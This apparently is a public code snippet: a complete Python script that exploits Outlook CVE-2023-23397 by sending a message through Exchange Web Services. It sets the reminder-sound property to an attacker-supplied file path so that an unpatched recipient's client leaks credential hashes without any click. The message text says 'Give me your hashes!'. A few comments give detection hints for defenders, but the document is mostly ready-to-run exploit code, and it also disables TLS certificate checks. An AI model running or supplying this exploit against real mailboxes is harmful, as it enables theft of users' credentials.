Created
March 28, 2023 09:30
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
# TLS certificate verification is switched off for every EWS request: whatever
# host answers for --server is trusted, so the credentials below are handed to
# it unconditionally. A reviewer would expect this to be opt-in rather than the
# default.
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
# Suppresses the InsecureRequestWarning the adapter above would otherwise emit
# on each request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import argparse
# All five options are mandatory. --password is taken from argv, so it is
# visible in process listings and shell history.
parser = argparse.ArgumentParser(description='Outlook CVE-2023-23397: 0-click PrivEsc')
parser.add_argument('-u', '--username', required=True)   # also used as the mailbox's primary SMTP address
parser.add_argument('-p', '--password', required=True)
parser.add_argument('-s', '--server', required=True)     # EWS host; autodiscover is not used
parser.add_argument('-t', '--target', required=True)     # recipient of the crafted message
parser.add_argument('-f', '--filepath', required=True)   # copied verbatim into PidLidReminderFileParameter
args = parser.parse_args()
def log(msg):
    """Write *msg* to stdout without appending a newline.

    Progress output in this script is assembled piecewise ("[*] ..." followed
    later by "DONE.\\n"), so callers supply their own line endings.
    """
    text = str(msg)
    print(text, end="")
log("[*] Logging in to EWS...")
# Username/password credentials for the EWS endpoint named on the command line.
credentials = Credentials(args.username, args.password)
config = Configuration(server=args.server, credentials=credentials)
# autodiscover=False: only --server is contacted. DELEGATE access to the
# caller's own mailbox (primary_smtp_address is the same value as --username).
account = Account(primary_smtp_address=args.username, config=config, autodiscover=False, access_type=DELEGATE)
log(args.username+"\n")
class PidLidReminderTime(ExtendedProperty):
    """MAPI named property PidLidReminderTime (MS-OXPROPS): the reminder's signal time.

    property_set_id is the PSETID_Common GUID shared by the other named
    properties declared in this file.
    """
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x8502
    property_type = 'SystemTime'
class PidLidReminderSet(ExtendedProperty):
    """MAPI named property PidLidReminderSet (MS-OXPROPS): whether a reminder is armed on the item."""
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x8503
    property_type = 'Boolean'
class PidLidReminderFileParameter(ExtendedProperty):
    """MAPI named property PidLidReminderFileParameter (MS-OXPROPS): path of the sound file played when the reminder fires.

    This is the property at the centre of CVE-2023-23397: unpatched Outlook
    consumed the path stored here when the reminder became due. For defenders,
    a message carrying this property is the primary indicator to hunt for.
    """
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x851f
    property_type = 'String'
class PidLidReminderOverride(ExtendedProperty):
    """MAPI named property PidLidReminderOverride (MS-OXPROPS).

    When TRUE the client is told to honour PidLidReminderPlaySound and
    PidLidReminderFileParameter instead of its defaults.
    """
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x851c
    property_type = 'Boolean'
class PidLidReminderPlaySound(ExtendedProperty):
    """MAPI named property PidLidReminderPlaySound (MS-OXPROPS): whether a sound is played when the reminder fires."""
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x851e
    property_type = 'Boolean'
class PidLidFlagRequest(ExtendedProperty):
    """MAPI named property PidLidFlagRequest (MS-OXPROPS): the follow-up flag's text."""
    property_set_id = '00062008-0000-0000-C000-000000000046'
    property_id = 0x8530
    property_type = 'String'
class PidTagFlagStatus(ExtendedProperty):
    """MAPI tagged property PidTagFlagStatus (MS-OXPROPS): follow-up flag state.

    Addressed by property_tag rather than by property set + id, unlike the
    PidLid* named properties above.
    """
    property_tag = 0x1090
    property_type = 'Integer'
class PidTagFlagComplete(ExtendedProperty):
    """MAPI tagged property 0x1091: the follow-up flag's completion time.

    MS-OXPROPS appears to list this tag as PidTagFlagCompleteTime; the local
    class name is shorter but refers to the same property.
    """
    property_tag = 0x1091
    property_type = 'SystemTime'
log("[*] Building malicious email message...\n")
# Plain message to --target, created in the sender's Sent folder. send_and_save()
# below keeps a copy there, so the sending mailbox retains an artifact of what
# was sent.
message = Message(account=account, folder=account.sent, subject="You Have Been Pwn3d!", body="Give me your hashes!", to_recipients=[args.target])
# Expose each extended property as an attribute on this message. The first
# argument is the attribute name; the reminder-file property is registered
# under the plural "PidLidReminderFileParameters" and is assigned under that
# name further down.
message.register('PidTagFlagStatus', PidTagFlagStatus)
message.register('PidTagFlagComplete', PidTagFlagComplete)
message.register('PidLidFlagRequest', PidLidFlagRequest)
message.register('PidLidReminderSet', PidLidReminderSet)
message.register('PidLidReminderTime', PidLidReminderTime)
message.register('PidLidReminderFileParameters', PidLidReminderFileParameter)
message.register('PidLidReminderOverride', PidLidReminderOverride)
message.register('PidLidReminderPlaySound', PidLidReminderPlaySound)
log("[*] Registered Extended Properites...\n")
log("[*] Setting values...")
# Follow-up flag fields. 2 is presumably the "flagged" status value
# (MS-OXOFLAG) — confirm against the spec.
message.PidTagFlagStatus = 2
message.PidLidFlagRequest = 'Pwn!'
# Arm the reminder with a signal time of "now", so it is already due when the
# recipient's client processes the item.
message.PidLidReminderSet = True
message.PidLidReminderTime = UTC_NOW()
message.PidTagFlagComplete = UTC_NOW()
# CVE-2023-23397: the attacker-chosen --filepath is stored in
# PidLidReminderFileParameter, the reminder-sound path that unpatched Outlook
# consumed when the reminder fired. Override/PlaySound = True tell the client
# to honour that custom path rather than its defaults.
# Defenders: hunt for mailbox items carrying this property; Microsoft's audit
# script for this CVE searches for exactly that, and the sender's Sent copy
# (see above) is a second place it appears.
message.PidLidReminderFileParameters = args.filepath
message.PidLidReminderOverride = True
message.PidLidReminderPlaySound = True
log("DONE.\n")
#print(message)
log("[+] Sending message...")
# Sends via EWS and stores the copy in the Sent folder chosen at construction.
message.send_and_save()
log("SENT!\n")